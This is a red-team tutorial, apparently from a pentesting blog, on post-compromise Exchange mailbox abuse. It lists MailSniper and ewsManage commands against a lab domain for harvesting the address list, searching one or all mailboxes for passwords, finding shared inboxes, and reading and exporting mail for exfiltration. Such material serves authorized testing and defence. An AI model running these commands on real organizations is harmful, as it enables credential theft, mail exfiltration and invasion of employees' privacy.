Gaining access to the mailbox of a domain user give the opportunity for a list of activities that could potentially expand the access of the red team. The trust relationships of the compromised user can be utilised to perform a more efficient Phishing or NTLM relay in order to gain access to further mailboxes. Access to a mailbox typically execution of arbitrary code via Outlook Rules. Furthermore, since the Global Address List (GAL) can be retrieved, a list of valid Active Directory usernames can be developed that could be used at a later stage.

MailSniper a PowerShell based tool developed by Beau Bullock can be used to interact with Exchange to conduct post compromise activities. The following command can be executed to obtain the Global Address List:

 Get-GlobalAddressList -ExchHostname exchange.pentestlab.local -Username [email protected] -Password Password123 
- mailsniper global address list - Microsoft Exchange – Mailbox Post Compromise
MailSniper – Global Address List

The list of email addresses can be converted to active directory usernames by using the Get-ADUsernameFromEWS function.

 Get-ADUsernameFromEWS -Emaillist .users.txt  
- mailsniper active directory username - Microsoft Exchange – Mailbox Post Compromise
MailSniper – Active Directory Usernames

Enumerating the Mailbox folders can assist towards the discovery of sensitive information if confidential is stored outside of the inbox folder.

 Get-MailboxFolders -Mailbox [email protected] 
- mailsniper mailbox folders - Microsoft Exchange – Mailbox Post Compromise
Enumerating Mailbox Folders

Often emails contain credentials for other services like VPN or other systems in the network. Searching a mailbox for passwords can lead a red teamer to spread his access in the network. MailSniper has a module which can search the inbox of the current user for credentials by using the terms password, creds, credentials.

 
Invoke-SelfSearch -Mailbox [email protected] 
- mailsniper credentials search - Microsoft Exchange – Mailbox Post Compromise
MailSniper – Search for Credentials

In the event that elevated credentials have been obtained (Exchange Administrator or Domain Administrator) the search for credentials can be expanded across every email inbox.

Invoke-GlobalMailSearch -ImpersonationAccount pentestlab -ExchHostname exchange 
- mailsniper global mail search - Microsoft Exchange – Mailbox Post Compromise
MailSniper – Global Mail Search

A PowerShell session will established with the Exchange by using the elevated account.

- mailsniper global mail search passwords - Microsoft Exchange – Mailbox Post Compromise
MailSniper – Global Mail Search Passwords Discovery

It is very common a domain user to have permissions to access a shared mailbox. Human Resources, Marketing teams are using them actively to respond to requests. Critical information can be stored in these mailboxes. MailSniper has the ability to discover other mailboxes that group email accounts or email users might have access.

 Invoke-OpenInboxFinder -Emaillist .users.txt 
- mailsniper open inbox - Microsoft Exchange – Mailbox Post Compromise
MailSniper – Open Inbox

Interaction with the mailbox of a target user is also feasible with the tool ewsManage. This tool can connect with the mailbox via Exchange Web Services and can perform various operations like read emails, search emails for credentials, list email folders and export emails.

 ewsManage.exe -CerValidation No -ExchangeVersion Exchange2013_SP1 -u pentestlab -p Password123 -ewsPath https://exchange.pentestlab.local/ews/Exchange.asmx -Mode ListFolder -Folder Inbox 
- ewsmanage list folder - Microsoft Exchange – Mailbox Post Compromise
ewsManage – List Email Folders

New emails that arrive in the inbox can be retrieved by using the ListUnreadMail parameter.

 ewsManage.exe -CerValidation No -ExchangeVersion Exchange2013_SP1 -u pentestlab -p Password123 -ewsPath https://exchange.pentestlab.local/ews/Exchange.asmx -Mode ListUnreadMail -Folder Inbox 
- ewsmanage list unread emails - Microsoft Exchange – Mailbox Post Compromise
ewsManage – List Unread Emails

Similar to MailSniper, ewsManage support a search function which can discover emails that contain sensitive information like passwords. However the -String parameter can be modified to other values for searching other information that might be stored in contrast to MailSniper which is configured by default to search only for credentials by using specific strings.

 ewsManage.exe -CerValidation No -ExchangeVersion Exchange2013_SP1 -u pentestlab -p Password123 -ewsPath https://exchange.pentestlab.local/ews/Exchange.asmx -Mode SearchMail -String pass 
- ewsmanage search email - Microsoft Exchange – Mailbox Post Compromise
ewsManage – Search Email for Passwords

The IteamId is the email in base-64 encoded format. The function ViewEmail can be used in conjunction with the relevant base-64 ID in order to read the contents of an email.

 ewsManage.exe -CerValidation No -ExchangeVersion Exchange2013_SP1 -u pentestlab -p Password123 -ewsPath https://exchange.pentestlab.local/ews/Exchange.asmx -Mode ViewMail -Id AQMkADEyNzgwYTExAC02NTA4LTQyNmQtOTNkNC0xN2MxOTRlZjU0NAEARgAAA3x0F0vOqQdIqxl0Lb/qweAHADujAMO2jXZLn/Ul6t7+dd8AAAIBDAAAADujAMO2jXZLn/Ul6t7+dd8AAAIBbwAAAA== 
- ewsmanage view email - Microsoft Exchange – Mailbox Post Compromise
ewsManage – Read Emails

Emails can be also exported locally so they can be exfiltrated by using the established communication channel.

 ewsManage.exe -CerValidation No -ExchangeVersion Exchange2013_SP1 -u pentestlab -p Password123 -ewsPath https://exchange.pentestlab.local/ews/Exchange.asmx -Mode ExportMail -Folder Inbox 
- ewsmanage export emails - Microsoft Exchange – Mailbox Post Compromise
ewsManage – Export Emails

A comprehensive search in the emails of the compromised user and the retrieval of the Global Address List can lead to legitimate access and more efficient Phishing.





Source link

No tags for this post.

LEAVE A REPLY

Please enter your comment!
Please enter your name here